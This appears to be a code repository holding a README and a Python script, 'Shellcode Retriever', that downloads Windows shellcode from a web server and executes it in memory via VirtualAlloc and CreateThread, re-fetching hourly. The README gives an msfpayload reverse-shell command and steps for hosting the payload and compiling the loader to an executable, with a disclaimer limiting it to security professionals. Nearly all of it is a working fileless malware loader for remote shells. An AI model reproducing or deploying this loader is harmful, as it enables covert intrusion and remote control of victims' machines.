├── README.md └── shellcode_retriever.py /README.md: -------------------------------------------------------------------------------- 1 | ##Shellcode Retriever 2 | 3 | Downloads win32 shellcode from webservers and executes the shellcode without it touching disk (using the following method: http://www.debasish.in/2012_04_01_archive.html) 4 | 5 | Modified for threading by yours truly. 6 | 7 | Original demo video: 8 | 9 | http://www.youtube.com/watch?v=R15B2p-uWKY 10 | 11 | --- 12 | 13 | For use by IT Security professionals and researchers. 14 | 15 | Usage: 16 | 17 | Create shellcode using the following msfpayload command: 18 | 19 | msfpayload windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=8080 EXITFUNC=thread R > test.txt 20 | 21 | Notice the exit function, very important if you want the process to run and beacon out based on timeouts in the source code. 22 | 23 | Upload the shellcode to your webserver. 24 | 25 | Compile the python code to an executeable by using pyinstaller. 26 | 27 | 28 | --- 29 | 30 | ##License: GPLv3 31 | 32 | 33 | Shellcode Retriever 34 | 35 | Author Joshua Pitts the.midnite.runr 'at' gmail com 36 | 37 | Copyright (C) 2013, Joshua Pitts 38 | 39 | License: GPLv3 40 | 41 | This program is free software: you can redistribute it and/or modify 42 | it under the terms of the GNU General Public License as published by 43 | the Free Software Foundation, either version 3 of the License, or 44 | (at your option) any later version. 45 | 46 | This program is distributed in the hope that it will be useful, 47 | but WITHOUT ANY WARRANTY; without even the implied warranty of 48 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 49 | GNU General Public License for more details. 50 | 51 | See for a copy of the GNU General 52 | Public License 53 | 54 | This program is to be used for only legal activities by IT security 55 | professionals and researchers. Author not responsible for malicious 56 | uses. -------------------------------------------------------------------------------- /shellcode_retriever.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2.7 2 | 3 | ''' 4 | A threaded version of @midnite_runr's shellcode_retriver script (https://github.com/secretsquirrel/shellcode_retriever) 5 | 6 | This payload is available in Veil-Evasion (https://github.com/Veil-Framework/Veil-Evasion/blob/master/modules/payloads/python/shellcode_inject/download_inject.py) 7 | 8 | If injecting Meterpreter shellcode, remember to specify 'thread' as the EXITFUNC in the handler 9 | ''' 10 | 11 | from threading import Thread 12 | from urllib2 import build_opener 13 | from ctypes import windll, c_int, c_char, pointer 14 | from time import sleep 15 | 16 | timesleep = 3600 17 | shellcode_url = 'URL_GOES_HERE' 18 | opener = build_opener() 19 | 20 | def allocate_exe(shellcode): 21 | """ 22 | ctypes VritualAlloc, MoveMem, and CreateThread 23 | From http://www.debasish.in/2012_04_01_archive.html 24 | """ 25 | ptr = windll.kernel32.VirtualAlloc(c_int(0), 26 | c_int(len(shellcode)), 27 | c_int(0x3000), 28 | c_int(0x40)) 29 | 30 | buf = (c_char * len(shellcode)).from_buffer(shellcode) 31 | 32 | windll.kernel32.RtlMoveMemory(c_int(ptr), 33 | buf, 34 | c_int(len(shellcode))) 35 | 36 | ht = windll.kernel32.CreateThread(c_int(0), 37 | c_int(0), 38 | c_int(ptr), 39 | c_int(0), 40 | c_int(0), 41 | pointer(c_int(0))) 42 | 43 | windll.kernel32.WaitForSingleObject(c_int(ht), c_int(-1)) 44 | 45 | def get_and_execute(url): 46 | info = opener.open(url) 47 | shellcode = info.read() 48 | shellcode = bytearray(shellcode) 49 | allocate_exe(shellcode) 50 | 51 | def main(): 52 | while True: 53 | try: 54 | t = Thread(name='get_and_execute', target=get_and_execute, args=(shellcode_url,)) 55 | t.setDaemon(True) 56 | t.start() 57 | 58 | sleep(timesleep) 59 | except Exception: 60 | pass 61 | 62 | if __name__ == "__main__": 63 | main() --------------------------------------------------------------------------------